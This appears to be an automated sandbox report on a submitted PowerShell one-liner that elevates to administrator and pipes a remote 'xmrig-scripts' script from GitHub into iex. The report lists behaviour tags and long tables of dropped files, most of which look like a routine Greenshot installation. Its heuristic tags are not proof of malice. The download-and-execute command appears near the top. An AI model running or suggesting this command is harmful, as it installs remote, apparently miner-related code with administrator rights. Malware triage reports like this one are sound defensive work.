Analysis Overview
Threat Level: Likely malicious
The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Executes dropped EXE
A potential corporate email address has been identified in the URL: [email protected]
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
Drops desktop.ini file(s)
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Subvert Trust Controls: Mark-of-the-Web Bypass
Launches sc.exe
Drops file in Program Files directory
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Access Token Manipulation: Create Process with Token
Browser Information Discovery
Uses Task Scheduler COM API
NTFS ADS
Modifies Control Panel
Checks processor information in registry
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Runs ping.exe
Modifies registry key
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
| Field | Value |
| Reported | 2024-11-13 07:23 |
Signatures
Analysis: behavioral1
Detonation Overview
| Field | Value |
| Submitted | 2024-11-13 07:23 |
| Reported | 2024-11-13 08:08 |
| Platform | win11-20241007-en |
| Max time kernel | 2700s |
| Max time network | 2587s |
Command Line
Signatures
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RCUTO.tmp\_isetup\_setup64.tmp | N/A |
| N/A | N/A | C:\Program Files\Greenshot\Greenshot.exe | N/A |
| N/A | N/A | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\greenshotocrcommand.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Greenshot = "C:\\Program Files\\Greenshot\\Greenshot.exe" | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
Checks installed software on the system
Command and Scripting Interpreter: PowerShell
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\GreenshotOCRCommand.exe | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\is-S9B53.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-ISPDR.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-18HKN.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-JT76M.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-F5RSP.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-04HRU.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-LR66V.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-SJJN3.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotOfficePlugin\is-AH51K.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-RQ2MH.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-2IDCM.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JUAQB.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-DRHL9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JBO19.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-UM4GL.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-KU4Q9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-MGM43.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-BMFRP.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-QKSBM.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-LDAO2.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-51T2U.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-55QDT.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File opened for modification | C:\Program Files\Greenshot\Greenshot.exe | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-NPD97.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-A8OE1.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-9B7KD.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotImgurPlugin\is-62VQ5.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-JDRPO.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-MJ7N1.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-LQ48H.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-RM7CL.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-8SRII.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-L67H6.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-OEK6B.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-F58TB.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-M0HBK.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-FQFNJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-0KCL5.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\is-Q9U9U.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-QNEPK.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-2G93M.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-A642T.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-676C9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-57LJH.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-H9TUD.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-4EETE.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\is-77KNE.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-NACB9.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-C45DB.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-9A4RN.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-SSH4J.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-RA2F5.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\is-M310A.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotOCRPlugin\is-RCS7M.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-J6E5D.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotExternalCommandPlugin\is-87R8S.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-5G9FT.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\is-98PL0.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Plugins\GreenshotOCRPlugin\is-ENBUN.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File created | C:\Program Files\Greenshot\Languages\Plugins\GreenshotImgurPlugin\is-6D8RR.tmp | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
| File opened for modification | C:\Program Files\Greenshot\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-CFM2T.tmp\Greenshot-INSTALLER-1.2.10.6-RELEASE.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexc.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index15.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Greenshot\1c7cbeae03e956efcf671a6f3ea6d088\Greenshot.ni.exe.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP9A4A.tmp\log4net.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexf.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index11.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPB285.tmp\System.Security.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\429d1f533624b62ab398cd9238b6be2f\System.Numerics.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\GreenshotPlugin\1fd5ba98e3dc7e9dedec5f51bdd3884a\GreenshotPlugin.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\LinqBridge\fe10f24c40ec4722ed97cf4c7d098e7c\LinqBridge.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP9C2E.tmp\System.Configuration.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index13.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index16.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index19.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp\tem4A0E.tmp | C:\Windows\system32\Clipup.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e6c-0\GreenshotPlugin.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index10.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index16.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index17.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ad0-0\System.Deployment.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11cc-0\System.Runtime.Serialization.Formatters.Soap.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index11.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index18.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index19.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1060-0\System.Data.SqlXml.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index12.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index15.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\index10.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File opened for modification | C:\Windows\assembly\NativeImages_v2.0.50727_64\index14.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPD37A.tmp\System.Deployment.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b98-0\Greenshot.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1058-0\System.Numerics.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAP948D.tmp\GreenshotPlugin.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\indexe.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\GACLock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\ngenlock.dat | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v2.0.50727_64\Temp\ZAPD697.tmp\LinqBridge.dll | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Security\ed88e474eb5a0dec06f9de17e677f038\System.Security.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runt9064068c#\c3e367eff9875c967c92b75a8688c55b\System.Runtime.Serialization.Formatters.Soap.ni.dll.aux.tmp | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe | N/A |
Launches sc.exe
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Greenshot-INSTALLER-1.2.10.6-RELEASE.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
